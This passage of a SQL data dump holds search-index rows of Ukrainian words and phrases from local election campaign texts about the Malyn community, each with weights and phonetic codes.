свої',0,1,1.4333,'в000',1,'*'),(1616147,'вам','вам',0,0,0.2,'в000',3,'*'),(1616148,'вам амалинській','вам амалинській',0,1,1.5,'в000',1,'*'),(1616149,'вам амалинській громаді','вам амалинській громаді',0,1,1.7667,'в000',1,'*'),(1616150,'вам кандидата','вам кандидата',0,1,1.4333,'в000',1,'*'),(1616151,'вам кандидата у','вам кандидата у',0,1,1.5,'в000',1,'*'),(1616152,'вами','вами',0,0,0.2667,'в000',1,'*'),(1616153,'вами життя','вами життя',0,1,1.3333,'в000',1,'*'),(1616154,'вами життя думаю','вами життя думаю',0,1,1.5333,'в000',1,'*'),(1616155,'вас','вас',0,0,0.2,'в000',2,'*'),(1616156,'вас такого','вас такого',0,1,1.3333,'в000',1,'*'),(1616157,'вас такого досвіду','вас такого досвіду',0,1,1.6,'в000',1,'*'),(1616158,'великій','великій',0,0,0.4667,'в000',1,'*'),(1616159,'великій малинській','великій малинській',0,1,1.6,'в000',1,'*'),(1616160,'великій малинській громаді','великій малинській громаді',0,1,1.8667,'в000',1,'*'),(1616161,'великий','великий',0,0,0.4667,'в000',1,'*'),(1616162,'великий кошик','великий кошик',0,1,1.4333,'в000',1,'*'),(1616163,'великий кошик який','великий кошик який',0,1,1.6,'в000',1,'*'),(1616164,'весь','весь',0,0,0.2667,'в000',1,'*'),(1616165,'весь інший','весь інший',0,1,1.3333,'в000',1,'*'),(1616166,'весь інший час','весь інший час',0,1,1.4667,'в000',1,'*'),(1616167,'ви балотуєтесь','ви балотуєтесь',0,1,1.4667,'в000',1,'*'),(1616168,'ви балотуєтесь у','ви балотуєтесь у',0,1,1.5333,'в000',1,'*'),(1616169,'вибір','вибір',0,0,0.3333,'в000',2,'*'),(1616170,'вибивати','вибивати',0,0,0.5333,'в000',1,'*'),(1616171,'вибивати той','вибивати той',0,1,1.4,'в000',1,'*'),(1616172,'вибивати той мінімальний','вибивати той мінімальний',0,1,1.8,'в000',1,'*'),(1616173,'виборі','виборі',0,0,0.4,'в000',1,'*'),(1616174,'виборі люди','виборі люди',0,1,1.3667,'в000',1,'*'),(1616175,'виборі люди мають','виборі люди мають',0,1,1.5667,'в000',1,'*'),(1616176,'вибори іспит','вибори іспит',0,1,1.4,'в000',1,'*'),(1616177,'вибори іспит для','вибори іспит для',0,1,1.5333,'в000',1,'*'),(1616178,'вибори до','вибори до',0,1,1.3,'в000',1,'*'),(1616179,'вибори до органів','вибори до органів',0,1,1.5667,'в000',1,'*'),(1616180,'вибори це','вибори це',0,1,1.3,'в000',1,'*'),(1616181,'вибори це шанс','вибори це шанс',0,1,1.4667,'в000',1,'*'),(1616182,'вибору','вибору',0,0,0.4,'в000',1,'*'),(1616183,'вибору залежить','вибору залежить',0,1,1.5,'в000',1,'*'),(1616184,'вибору залежить стабільність','вибору залежить стабільність',0,1,1.9333,'в000',1,'*'),(1616185,'вигідну','вигідну',0,0,0.4667,'в000',1,'*'),(1616186,'вигідну кандидатуру','вигідну кандидатуру',0,1,1.6333,'в000',1,'*'),(1616187,'вигідну кандидатуру добре','вигідну кандидатуру добре',0,1,1.8333,'в000',1,'*'),(1616188,'визрів','визрів',0,0,0.4,'в000',1,'*'),(1616189,'визрів запит','визрів запит',0,1,1.4,'в000',1,'*'),(1616190,'визрів запит на','визрів запит на',0,1,1.5,'в000',1,'*'),(1616191,'вийшла','вийшла',0,0,0.4,'в000',1,'*'),(1616192,'вийшла і','вийшла і',0,1,1.2667,'в000',1,'*'),(1616193,'вийшла і в','вийшла і в',0,1,1.3333,'в000',1,'*'),(1616194,'виникала','виникала',0,0,0.5333,'в000',1,'*'),(1616195,'виникала думка','виникала думка',0,1,1.4667,'в000',1,'*'),(1616196,'виникала думка що','виникала думка що',0,1,1.5667,'в000',1,'*'),(1616197,'виникнення','виникнення',0,0,0.6667,'в000',1,'*'),(1616198,'виникнення якоїсь','виникнення якоїсь',0,1,1.5667,'в000',1,'*'),(1616199,'виникнення якоїсь проблеми','виникнення якоїсь проблеми',0,1,1.8667,'в000',1,'*'),(1616200,'вирішення','вирішення',0,0,0.6,'в000',1,'*'),(1616201,'вирішення адже','вирішення адже',0,1,1.4667,'в000',1,'*'),(1616202,'вирішення адже більшість','вирішення адже більшість',0,1,1.8,'в000',1,'*'),(1616203,'вирішення найнеобхідніших','вирішення найнеобхідніших',0,1,1.8333,'в000',1,'*'),(1616204,'вирішення найнеобхідніших проблем','вирішення найнеобхідніших проблем',0,1,2,'в000',1,'*'),(1616205,'вирішувати','вирішувати',0,0,0.6667,'в000',1,'*'),(1616206,'вирішувати безліч','вирішувати безліч',0,1,1.5667,'в000',1,'*'),(1616207,'вирішувати безліч питань','вирішувати безліч питань',0,1,1.8,'в000',1,'*'),(1616208,'виробничій','виробничій',0,0,0.6667,'в000',1,'*'),(1616209,'виробничій та','виробничій та',0,1,1.4333,'в000',1,'*'),(1616210,'виробничій та управлінській','виробничій та управлінській',0,1,1.9,'в000',1,'*'),(1616211,'виробничих','виробничих',0,0,0.6667,'в000',1,'*'),(1616212,'виробничих підрозділів','виробничих підрозділів',0,1,1.7333,'в000',1,'*'),(1616213,'виробничих підрозділів вчителі','виробничих підрозділів вчителі',0,1,2,'в000',1,'*'),(1616214,'витрачались','витрачались',0,0,0.7333,'в000',1,'*'),(1616215,'витрачались приміром','витрачались приміром',0,1,1.6667,'в000',1,'*'),(1616216,'витрачались приміром на','витрачались приміром на',0,1,1.7667,'в000',1,'*'),(1616217,'влади','влади',0,0,0.3333,'в000',1,'*'),(1616218,'влади для','влади для',0,1,1.3,'в000',1,'*'),(1616219,'влади для нашої','влади для нашої',0,1,1.5,'в000',1,'*'),(1616220,'влади людей','влади людей',0,1,1.3667,'в000',1,'*'),(1616221,'влади людей позбавили','влади людей позбавили',0,1,1.7,'в000',1,'*'),(1616222,'власні','власні',0,0,0.4,'в000',1,'*'),(1616223,'власні фінансові','власні фінансові',0,1,1.5333,'в000',1,'*'),(1616224,'власні фінансові ресурси','власні фінансові ресурси',0,1,1.8,'в000',1,'*'),(1616225,'власний','власний',0,0,0.4667,'в000',1,'*'),(1616226,'власний бізнес','власний бізнес',0,1,1.4667,'в000',1,'*'),(1616227,'власний бізнес для','власний бізнес для',0,1,1.6,'в000',1,'*'),(1616228,'власними','власними',0,0,0.5333,'в000',1,'*'),(1616229,'власними звичаями','власними звичаями',0,1,1.5667,'в000',1,'*'),(1616230,'власними звичаями які','власними звичаями які',0,1,1.7,'в000',1,'*'),(1616231,'власну','власну',0,0,0.4,'в000',1,'*'),(1616232,'власну ініціативу','власну ініціативу',0,1,1.5667,'в000',1,'*'),(1616233,'власну ініціативу він','власну ініціативу він',0,1,1.7,'в000',1,'*'),(1616234,'воїни','воїни',0,0,0.3333,'в000',1,'*'),(1616235,'воїни ато','воїни ато',0,1,1.3,'в000',1,'*'),(1616236,'воїни ато у','воїни ато у',0,1,1.3667,'в000',1,'*'),(1616237,'води на','води на',0,1,1.2333,'в000',1,'*'),(1616238,'води на інші','води на інші',0,1,1.4,'в000',1,'*'),(1616239,'вони в','вони в',0,1,1.2,'в000',1,'*'),(1616240,'вони в чомусь','вони в чомусь',0,1,1.4333,'в000',1,'*'),(1616241,'вони почувались','вони почувались',0,1,1.5,'в000',1,'*'),(1616242,'вони почувались комфортно','вони почувались комфортно',0,1,1.8333,'в000',1,'*'),(1616243,'вони пройдуть','вони пройдуть',0,1,1.4333,'в000',1,'*'),(1616244,'вони пройдуть то','вони пройдуть то',0,1,1.5333,'в000',1,'*'),(1616245,'впевнена','впевнена',0,0,0.5333,'в000',1,'*'),(1616246,'впевнена що','впевнена що',0,1,1.3667,'в000',1,'*'),(1616247,'впевнена що якщо','впевнена що якщо',0,1,1.5333,'в000',1,'*'),(1616248,'враження','враження',0,0,0.5333,'в000',1,'*'),(1616249,'враження що','враження що',0,1,1.3667,'в000',1,'*'),(1616250,'враження що заразвідбувається','враження що заразвідбувається',0,1,1.9667,'в000',1,'*'),(1616251,'всієї','всієї',0,0,0.3333,'в000',1,'*'),(1616252,'всієї громади','всієї громади',0,1,1.4333,'в000',1,'*'),(1616253,'всієї громади а','всієї громади а',0,1,1.5,'в000',1,'*'),(1616254,'всіх для','всіх для',0,1,1.2667,'в000',1,'*'),(1616255,'всіх для політичних','всіх для політичних',0,1,1.6333,'в000',1,'*'),(1616256,'всіх справ','всіх справ',0,1,1.3333,'в000',1,'*'),(1616257,'всіх справ сельчан','всіх справ сельчан',0,1,1.6,'в000',1,'*'),(1616258,'все','все',0,0,0.2,'в000',1,'*'),(1616259,'все ліквідовується','все ліквідовується',0,1,1.6,'в000',1,'*'),(1616260,'все ліквідовується і','все ліквідовується і',0,1,1.6667,'в000',1,'*'),(1616261,'все робити','все робити',0,1,1.3333,'в000',1,'*'),(1616262,'все робити для','все робити для',0,1,1.4667,'в000',1,'*'),(1616263,'вулиць','вулиць',0,0,0.4,'в000',1,'*'),(1616264,'вулиць ремонт','вулиць ремонт',0,1,1.4333,'в000',1,'*'),(1616265,'вулиць ремонт комунальних','вулиць ремонт комунальних',0,1,1.8333,'в000',1,'*'),(1616266,'вчителі','вчителі',0,0,0.4667,'в000',1,'*'),(1616267,'вчителі лікарі','вчителі лікарі',0,1,1.4667,'в000',1,'*'),(1616268,'вчителі лікарі бухгалтера','вчителі лікарі бухгалтера',0,1,1.8333,'в000',1,'*'),(1616269,'гаманців»,','гаманців»,',0,0,0.6667,'г000',1,'*'),(1616270,'гаманців», ми','гаманців», ми',0,1,1.4333,'г000',1,'*'),(1616271,'гаманців», ми не','гаманців», ми не',0,1,1.5333,'г000',1,'*'),(1616272,'гарантія','гарантія',0,0,0.5333,'г000',1,'*'),(1616273,'гарантія що','гарантія що',0,1,1.3667,'г000',1,'*'),(1616274,'гарантія що ці','гарантія що ці',0,1,1.4667,'г000',1,'*'),(1616275,'географічне','географічне',0,0,0.7333,'г000',1,'*'),(1616276,'географічне розташування','географічне розташування',0,1,1.8,'г000',1,'*'),(1616277,'географічне розташування прекрасна','географічне розташування прекрасна',0,1,2,'г000',1,'*'),(1616278,'глибше','глибше',0,0,0.4,'г000',1,'*'),(1616279,'глибше аналізуєш','глибше аналізуєш',0,1,1.5333,'г000',1,'*'),(1616280,'глибше аналізуєш ситуацію','глибше аналізуєш ситуацію',0,1,1.8333,'г000',1,'*'),(1616281,'голова','голова',0,0,0.4,'г000',3,'*'),(1616282,'голова в','голова в',0,1,1.2667,'г000',1,'*'),(1616283,'голова в котрого','голова в котрого',0,1,1.5333,'г000',1,'*'),(1616284,'голови','голови',0,0,0.4,'г000',2,'*'),(1616285,'голови міської','голови міської',0,1,1.4667,'г000',1,'*'),(1616286,'голови міської ради','голови міської ради',0,1,1.6333,'г000',1,'*'),(1616287,'головою','головою',0,0,0.4667,'г000',1,'*'),(1616288,'головою сільської','головою сільської',0,1,1.5667,'г000',1,'*'),(1616289,'головою сільської ради','головою сільської ради',0,1,1.7333,'г000',1,'*'),(1616290,'голову малинської','голову малинської',0,1,1.5667,'г000',1,'*'),(1616291,'голову малинської організації','голову малинської організації',0,1,1.9667,'г000',1,'*'),(1616292,'голосування','голосування',0,0,0.7333,'г000',2,'*'),(1616293,'голосування а','голосування а',0,1,1.4333,'г000',1,'*'),(1616294,'голосування а працюватимуть','голосування а працюватимуть',0,1,1.9,'г000',1,'*'),(1616295,'громад кожне','громад кожне',0,1,1.4,'г000',1,'*'),(1616296,'громад кожне село','громад кожне село',0,1,1.5667,'г000',1,'*'),(1616297,'громаді','громаді',0,0,0.4667,'г000',1,'*'),(1616298,'громаді а','громаді а',0,1,1.3,'г000',1,'*'),(1616299,'громаді а які','громаді а які',0,1,1.4333,'г000',1,'*'),(1616300,'громаді побажаємо','громаді побажаємо',0,1,1.5667,'г000',1,'*'),(1616301,'громаді побажаємо зробити','громаді побажаємо зробити',0,1,1.8333,'г000',1,'*'),(1616302,'громаді почувались','громаді почувались',0,1,1.6,'г000',1,'*'),(1616303,'громаді почувались захищеними»','громаді почувались захищеними»',0,1,2,'г000',1,'*'),(1616304,'громади','громади',0,0,0.4667,'г000',1,'*'),(1616305,'громади а','громади а',0,1,1.3,'г000',1,'*'),(1616306,'громади а й','громади а й',0,1,1.3667,'г000',1,'*'),(1616307,'громади кошти','громади кошти',0,1,1.4333,'г000',1,'*'),(1616308,'громади кошти наскільки','громади кошти наскільки',0,1,1.7667,'г000',1,'*'),(1616309,'громади проявляти','громади проявляти',0,1,1.5667,'г000',1,'*'),(1616310,'громади проявляти власну','громади проявляти власну',0,1,1.8,'г000',1,'*'),(1616311,'громади сьогодні','громади сьогодні',0,1,1.5333,'г000',1,'*'),(1616312,'громади сьогодні у','громади сьогодні у',0,1,1.6,'г000',1,'*'),(1616313,'громади чи','громади чи',0,1,1.3333,'г000',1,'*'),(1616314,'громади чи перепадатиме','громади чи перепадатиме',0,1,1.7667,'г000',1,'*'),(1616315,'громадянську','громадянську',0,0,0.8,'г000',1,'*'),(1616316,'громадянську позицію','громадянську позицію',0,1,1.6667,'г000',1,'*'),(1616317,'громадянську позицію він','громадянську позицію він',0,1,1.8,'г000',1,'*'),(1616318,'дати','дати',0,0,0.2667,'д000',1,'*'),(1616319,'дати молодим','дати молодим',0,1,1.4,'д000',1,'*'),(1616320,'дати молодим енергійним','дати молодим енергійним',0,1,1.7667,'д000',1,'*'),(1616321,'де гарантія','де гарантія',0,1,1.3667,'д000',1,'*'),(1616322,'де гарантія що','де гарантія що',0,1,1.4667,'д000',1,'*'),(1616323,'декого','декого',0,0,0.4,'д000',1,'*'),(1616324,'декого вибори','декого вибори',0,1,1.4333,'д000',1,'*'),(1616325,'декого вибори це','декого вибори це',0,1,1.5333,'д000',1,'*'),(1616326,'день доводилось','день доводилось',0,1,1.5,'д000',1,'*'),(1616327,'день доводилось працювати','день доводилось працювати',0,1,1.8333,'д000',1,'*'),(1616328,'депутатів для','депутатів для',0,1,1.4333,'д000',1,'*'),(1616329,'депутатів для рядових','депутатів для рядових',0,1,1.7,'д000',1,'*'),(1616330,'депутатів у','депутатів у',0,1,1.3667,'д000',1,'*'),(1616331,'депутатів у разі','депутатів у разі',0,1,1.5333,'д000',1,'*'),(1616332,'депутати малинської','депутати малинської',0,1,1.6333,'д000',2,'*'),(1616333,'депутати малинської міської','депутати малинської міської',0,1,1.9,'д000',2,'*'),(1616334,'депутати обласної','депутати обласної',0,1,1.5667,'д000',1,'*'),(1616335,'депутати обласної і','депутати обласної і',0,1,1.6333,'д000',1,'*'),(1616336,'депутати судять','депутати судять',0,1,1.5,'д000',1,'*'),(1616337,'депутати судять і','депутати судять і',0,1,1.5667,'д000',1,'*'),(1616338,'депутатству','депутатству',0,0,0.7333,'д000',1,'*'),(1616339,'депутатству в','депутатству в',0,1,1.4333,'д000',1,'*'),(1616340,'депутатству в міській','депутатству в міській',0,1,1.7,'д000',1,'*'),(1616341,'депутатське','депутатське',0,0,0.7333,'д000',1,'*'),(1616342,'депутатське місце','депутатське місце',0,1,1.5667,'д000',1,'*'),(1616343,'депутатське місце просто','депутатське місце просто',0,1,1.8,'д000',1,'*'),(1616344,'державі','державі',0,0,0.4667,'д000',1,'*'),(1616345,'державі і','державі і',0,1,1.3,'д000',1,'*'),(1616346,'державі і якість','державі і якість',0,1,1.5333,'д000',1,'*'),(1616347,'десятка','десятка',0,0,0.4667,'д000',1,'*'),(1616348,'десятка місцевих','десятка місцевих',0,1,1.5333,'д000',1,'*'),(1616349,'десятка місцевих депутатів','десятка місцевих депутатів',0,1,1.8667,'д000',1,'*'),(1616350,'десять','десять',0,0,0.4,'д000',1,'*'),(1616351,'десять років','десять років',0,1,1.4,'д000',1,'*'),(1616352,'десять років головою','десять років головою',0,1,1.6667,'д000',1,'*'),(1616353,'десять років педагогічного','десять років педагогічного',0,1,1.8667,'д000',1,'*'),(1616354,'для всіх','для всіх',0,1,1.2667,'д000',1,'*'),(1616355,'для всіх для','для всіх для',0,1,1.4,'д000',1,'*'),(1616356,'для декого','для декого',0,1,1.3333,'д000',1,'*'),(1616357,'для декого вибори','для декого вибори',0,1,1.5667,'д000',1,'*'),(1616358,'для депутатів','для депутатів',0,1,1.4333,'д000',1,'*'),(1616359,'для депутатів для','для депутатів для',0,1,1.5667,'д000',1,'*'),(1616360,'для керівників','для керівників',0,1,1.4667,'д000',1,'*'),(1616361,'для керівників усіх','для керівників усіх',0,1,1.6333,'д000',1,'*'),(1616362,'для міста','для міста',0,1,1.3,'д000',1,'*'),(1616363,'для міста малин','для міста малин',0,1,1.5,'д000',1,'*'),(1616364,'для нашої','для нашої',0,1,1.3,'д000',1,'*'),(1616365,'для нашої команди','для нашої команди',0,1,1.5667,'д000',1,'*'),(1616366,'для політичних','для політичних',0,1,1.4667,'д000',1,'*'),(1616367,'для політичних партій','для політичних партій',0,1,1.7,'д000',1,'*'),(1616368,'для рядових','для рядових',0,1,1.3667,'д000',1,'*'),(1616369,'для рядових працівників','для рядових працівників',0,1,1.7667,'д000',1,'*'),(1616370,'для створення','для створення',0,1,1.4333,'д000',1,'*'),(1616371,'для створення робочих','для створення робочих',0,1,1.7,'д000',1,'*'),(1616372,'для цього','для цього',0,1,1.3,'д000',1,'*'),(1616373,'для цього у','для цього у',0,1,1.3667,'д000',1,'*'),(1616374,'до влади','до влади',0,1,1.2667,'д000',1,'*'),(1616375,'до влади для','до влади для',0,1,1.4,'д000',1,'*'),(1616376,'до органів','до органів',0,1,1.3333,'д000',1,'*'),(1616377,'до органів місцевого','до органів місцевого',0,1,1.6667,'д000',1,'*'),(1616378,'до реформи','до реформи',0,1,1.3333,'д000',1,'*'),(1616379,'до реформи кожна','до реформи кожна',0,1,1.5333,'д000',1,'*'),(1616380,'добре','добре',0,0,0.3333,'д000',1,'*'),(1616381,'добре аби','добре аби',0,1,1.3,'д000',1,'*'),(1616382,'добре аби старостою','добре аби старостою',0,1,1.6333,'д000',1,'*'),(1616383,'добре зважити','добре зважити',0,1,1.4333,'д000',1,'*'),(1616384,'добре зважити як','добре зважити як',0,1,1.5333,'д000',1,'*'),(1616385,'добре знає','добре знає',0,1,1.3333,'д000',1,'*'),(1616386,'добре знає проблеми','добре знає проблеми',0,1,1.6333,'д000',1,'*'),(1616387,'доводилось','доводилось',0,0,0.6667,'д000',1,'*'),(1616388,'доводилось працювати','доводилось працювати',0,1,1.6667,'д000',1,'*'),(1616389,'доводилось працювати з','доводилось працювати з',0,1,1.7333,'д000',1,'*'),(1616390,'доля','доля',0,0,0.2667,'д000',1,'*'),(1616391,'доля міста','доля міста',0,1,1.3333,'д000',1,'*'),(1616392,'доля міста своєї','доля міста своєї',0,1,1.5333,'д000',1,'*'),(1616393,'доля селян','доля селян',0,1,1.3333,'д000',1,'*'),(1616394,'доля селян а','доля селян а',0,1,1.4,'д000',1,'*'),(1616395,'доріг то','доріг то',0,1,1.2667,'д000',1,'*'),(1616396,'доріг то віднині','доріг то віднині',0,1,1.5333,'д000',1,'*'),(1616397,'дороге','дороге',0,0,0.4,'д000',1,'*'),(1616398,'дороге село','дороге село',0,1,1.3667,'д000',1,'*'),(1616399,'дороге село я','дороге село я',0,1,1.4333,'д000',1,'*'),(1616400,'дорогу','дорогу',0,0,0.4,'д000',1,'*'),(1616401,'дорогу в','дорогу в',0,1,1.2667,'д000',1,'*'),(1616402,'дорогу в обласну','дорогу в обласну',0,1,1.5333,'д000',1,'*'),(1616403,'досі','досі',0,0,0.2667,'д000',1,'*'),(1616404,'досі немає','досі немає',0,1,1.3333,'д000',1,'*'),(1616405,'досі немає закону','досі немає закону',0,1,1.5667,'д000',1,'*'),(1616406,'досвідом','досвідом',0,0,0.5333,'д000',1,'*'),(1616407,'досвідом у','досвідом у',0,1,1.3333,'д000',1,'*'),(1616408,'досвідом у виробничій','досвідом у виробничій',0,1,1.7,'д000',1,'*'),(1616409,'досвіду','досвіду',0,0,0.4667,'д000',1,'*'),(1616410,'досвіду достатньо','досвіду достатньо',0,1,1.5667,'д000',1,'*'),(1616411,'досвіду достатньо так','досвіду достатньо так',0,1,1.7,'д000',1,'*'),(1616412,'достатньо так','достатньо так',0,1,1.4333,'д000',1,'*'),(1616413,'достатньо так із','достатньо так із',0,1,1.5333,'д000',1,'*'),(1616414,'дуже','дуже',0,0,0.2667,'д000',1,'*'),(1616415,'дуже відповідальні','дуже відповідальні',0,1,1.6,'д000',1,'*'),(1616416,'дуже відповідальні у','дуже відповідальні у',0,1,1.6667,'д000',1,'*'),(1616417,'думаю','думаю',0,0,0.3333,'д000',1,'*'),(1616418,'думаю при','думаю при',0,1,1.3,'д000',1,'*'),(1616419,'думаю при виборі','думаю при виборі',0,1,1.5333,'д000',1,'*'),(1616420,'думка','думка',0,0,0.3333,'д000',1,'*'),(1616421,'думка що','думка що',0,1,1.2667,'д000',1,'*'),(1616422,'думка що вони','думка що вони',0,1,1.4333,'д000',1,'*'),(1616423,'енергійним','енергійним',0,0,0.6667,'е000',1,'*'),(1616424,'енергійним людям','енергійним людям',0,1,1.5333,'е000',1,'*'),(1616425,'енергійним людям у','енергійним людям у',0,1,1.6,'е000',1,'*'),(1616426,'ж','ж',0,0,0.0667,'ж000',3,'*'),(1616427,'ж залежним','ж залежним',0,1,1.3333,'ж000',1,'*'),(1616428,'ж залежним від','ж залежним від',0,1,1.4667,'ж000',1,'*'),(1616429,'ж удачі','ж удачі',0,1,1.2333,'ж000',1,'*'),(1616430,'ж удачі вам','ж удачі вам',0,1,1.3667,'ж000',1,'*'),(1616431,'жили','жили',0,0,0.2667,'ж000',1,'*'),(1616432,'жили заможніше','жили заможніше',0,1,1.4667,'ж000',1,'*'),(1616433,'жили заможніше і','жили заможніше і',0,1,1.5333,'ж000',1,'*'),(1616434,'жити','жити',0,0,0.2667,'ж000',1,'*'),(1616435,'жити й','жити й',0,1,1.2,'ж000',1,'*'),(1616436,'жити й розвиватись','жити й розвиватись',0,1,1.6,'ж000',1,'*'),(1616437,'житлово-комунального','житлово-комунального',0,0,1,'ж000',1,'*'),(1616438,'житлово-комунального медичного','житлово-комунального медичного',0,1,2,'ж000',1,'*'),(1616439,'житлово-комунального медичного обслуговування','житлово-комунального медичного обслуговування',0,1,2,'ж000',1,'*'),(1616440,'життя думаю','життя думаю',0,1,1.3667,'ж000',1,'*'),(1616441,'життя думаю при','життя думаю при',0,1,1.5,'ж000',1,'*'),(1616442,'з іншими політичними','з іншими політичними',0,1,1.6667,'з000',1,'*'),(1616443,'з вами','з вами',0,1,1.2,'з000',1,'*'),(1616444,'з вами життя','з вами життя',0,1,1.4,'з000',1,'*'),(1616445,'з власними','з власними',0,1,1.3333,'з000',1,'*'),(1616446,'з власними звичаями','з власними звичаями',0,1,1.6333,'з000',1,'*'),(1616447,'з крупним','з крупним',0,1,1.3,'з000',1,'*'),(1616448,'з крупним бізнесом','з крупним бізнесом',0,1,1.6,'з000',1,'*'),(1616449,'з людьми','з людьми',0,1,1.2667,'з000',1,'*'),(1616450,'з людьми перейматись','з людьми перейматись',0,1,1.6667,'з000',1,'*'),(1616451,'з села','з села',0,1,1.2,'з000',1,'*'),(1616452,'з села вийшла','з села вийшла',0,1,1.4333,'з000',1,'*'),(1616453,'з селом','з селом',0,1,1.2333,'з000',1,'*'),(1616454,'з селом працюючи','з селом працюючи',0,1,1.5333,'з000',1,'*'),(1616455,'заборгованості','заборгованості',0,0,0.9333,'з000',1,'*'),(1616456,'заборгованості по','заборгованості по',0,1,1.5667,'з000',1,'*'),(1616457,'заборгованості по очистці','заборгованості по очистці',0,1,1.8333,'з000',1,'*'),(1616458,'завдання','завдання',0,0,0.5333,'з000',1,'*'),(1616459,'завдання ставлю','завдання ставлю',0,1,1.5,'з000',1,'*'),(1616460,'завдання ставлю захист','завдання ставлю захист',0,1,1.7333,'з000',1,'*'),(1616461,'займає','займає',0,0,0.4,'з000',2,'*'),(1616462,'займає якщо','займає якщо',0,1,1.3667,'з000',1,'*'),(1616463,'займає якщо зробити','займає якщо зробити',0,1,1.6333,'з000',1,'*'),(1616464,'займати','займати',0,0,0.4667,'з000',2,'*'),(1616465,'займати депутатське','займати депутатське',0,1,1.6333,'з000',1,'*'),(1616466,'займати депутатське місце','займати депутатське місце',0,1,1.8333,'з000',1,'*'),(1616467,'закону','закону',0,0,0.4,'з000',2,'*'),(1616468,'закону про','закону про',0,1,1.3333,'з000',1,'*'),(1616469,'закону про старостинські','закону про старостинські',0,1,1.8,'з000',1,'*'),(1616470,'залежить','залежить',0,0,0.5333,'з000',2,'*'),(1616471,'залежить стабільність','залежить стабільність',0,1,1.7,'з000',1,'*'),(1616472,'залежить стабільність у','залежить стабільність у',0,1,1.7667,'з000',1,'*'),(1616473,'залежним','залежним',0,0,0.5333,'з000',1,'*'),(1616474,'залежним від','залежним від',0,1,1.4,'з000',1,'*'),(1616475,'залежним від голови','залежним від голови',0,1,1.6333,'з000',1,'*'),(1616476,'залишається','залишається',0,0,0.7333,'з000',1,'*'),(1616477,'залишається в','залишається в',0,1,1.4333,'з000',1,'*'),(1616478,'залишається в невигідному','залишається в невигідному',0,1,1.8333,'з000',1,'*'),(1616479,'залучати','залучати',0,0,0.5333,'з000',1,'*'),(1616480,'залучати інвестиції','залучати інвестиції',0,1,1.6333,'з000',1,'*'),(1616481,'залучати інвестиції у','залучати інвестиції у',0,1,1.7,'з000',1,'*'),(1616482,'замінити','замінити',0,0,0.5333,'з000',1,'*'),(1616483,'замінити на','замінити на',0,1,1.3667,'з000',1,'*'),(1616484,'замінити на більш','замінити на більш',0,1,1.5667,'з000',1,'*'),(1616485,'заможніше','заможніше',0,0,0.6,'з000',1,'*'),(1616486,'заможніше і','заможніше і',0,1,1.3667,'з000',1,'*'),(1616487,'заможніше і почувались','заможніше і почувались',0,1,1.7333,'з000',1,'*'),(1616488,'запит','запит',0,0,0.3333,'з000',1,'*'),(1616489,'запит на','запит на',0,1,1.2667,'з000',1,'*'),(1616490,'запит на людей','запит на людей',0,1,1.4667,'з000',1,'*'),(1616491,'запуск','запуск',0,0,0.4,'з000',1,'*'),(1616492,'запуск нових','запуск нових',0,1,1.4,'з000',1,'*'),(1616493,'запуск нових і','запуск нових і',0,1,1.4667,'з000',1,'*'),(1616494,'заразвідбувається','заразвідбувається',0,0,1,'з000',1,'*'),(1616495,'заразвідбувається узурпація','заразвідбувається узурпація',0,1,1.9,'з000',1,'*'),(1616496,'заразвідбувається узурпація влади','заразвідбувається узурпація влади',0,1,2,'з000',1,'*'),(1616497,'затим','затим',0,0,0.3333,'з000',1,'*'),(1616498,'затим в','затим в',0,1,1.2333,'з000',1,'*'),(1616499,'затим в районній','затим в районній',0,1,1.5333,'з000',1,'*'),(1616500,'захист сільських','захист сільських',0,1,1.5333,'з000',1,'*'),(1616501,'захист сільських громад','захист сільських громад',0,1,1.7667,'з000',1,'*'),(1616502,'захищати','захищати',0,0,0.5333,'з000',1,'*'),(1616503,'захищати власний','захищати власний',0,1,1.5333,'з000',1,'*'),(1616504,'захищати власний бізнес','захищати власний бізнес',0,1,1.7667,'з000',1,'*'),(1616505,'захищеними','захищеними',0,0,0.6667,'з000',1,'*'),(1616506,'захищеними ми','захищеними ми',0,1,1.4333,'з000',1,'*'),(1616507,'захищеними ми команда','захищеними ми команда',0,1,1.7,'з000',1,'*'),(1616508,'захищеними»','захищеними»',0,0,0.7333,'з000',1,'*'),(1616509,'зберегти','зберегти',0,0,0.5333,'з000',1,'*'),(1616510,'зберегти і','зберегти і',0,1,1.3333,'з000',1,'*'),(1616511,'зберегти і примножити','зберегти і примножити',0,1,1.7,'з000',1,'*'),(1616512,'збираємось','збираємось',0,0,0.6667,'з000',1,'*'),(1616513,'збираємось мірятись','збираємось мірятись',0,1,1.6333,'з000',1,'*'),(1616514,'збираємось мірятись рейтингами','збираємось мірятись рейтингами',0,1,2,'з000',1,'*'),(1616515,'збираюсь','збираюсь',0,0,0.5333,'з000',1,'*'),(1616516,'збираюсь піаритись','збираюсь піаритись',0,1,1.6,'з000',1,'*'),(1616517,'збираюсь піаритись на','збираюсь піаритись на',0,1,1.7,'з000',1,'*'),(1616518,'зважити','зважити',0,0,0.4667,'з000',1,'*'),(1616519,'зважити як','зважити як',0,1,1.3333,'з000',1,'*'),(1616520,'зважити як кандидат','зважити як кандидат',0,1,1.6333,'з000',1,'*'),(1616521,'звичаями','звичаями',0,0,0.5333,'з000',1,'*'),(1616522,'звичаями які','звичаями які',0,1,1.4,'з000',1,'*'),(1616523,'звичаями які формувалися','звичаями які формувалися',0,1,1.8,'з000',1,'*'),(1616524,'змогу','змогу',0,0,0.3333,'з000',1,'*'),(1616525,'змогу нормально','змогу нормально',0,1,1.5,'з000',1,'*'),(1616526,'змогу нормально жити','змогу нормально жити',0,1,1.6667,'з000',1,'*'),(1616527,'зможе','зможе',0,0,0.3333,'з000',1,'*'),(1616528,'зможе відстоювати','зможе відстоювати',0,1,1.5667,'з000',1,'*'),(1616529,'зможе відстоювати інтереси','зможе відстоювати інтереси',0,1,1.8667,'з000',1,'*'),(1616530,'зможу','зможу',0,0,0.3333,'з000',1,'*'),(1616531,'зможу у','зможу у',0,1,1.2333,'з000',1,'*'),(1616532,'зможу у разі','зможу у разі',0,1,1.4,'з000',1,'*'),(1616533,'знає','знає',0,0,0.2667,'з000',1,'*'),(1616534,'знає проблеми','знає проблеми',0,1,1.4333,'з000',1,'*'),(1616535,'знає проблеми села','знає проблеми села',0,1,1.6,'з000',1,'*'),(1616536,'знайдеться','знайдеться',0,0,0.6667,'з000',1,'*'),(1616537,'знайдеться тисячу','знайдеться тисячу',0,1,1.5667,'з000',1,'*'),(1616538,'знайдеться тисячу причин','знайдеться тисячу причин',0,1,1.8,'з000',1,'*'),(1616539,'знала','знала',0,0,0.3333,'з000',1,'*'),(1616540,'знала що','знала 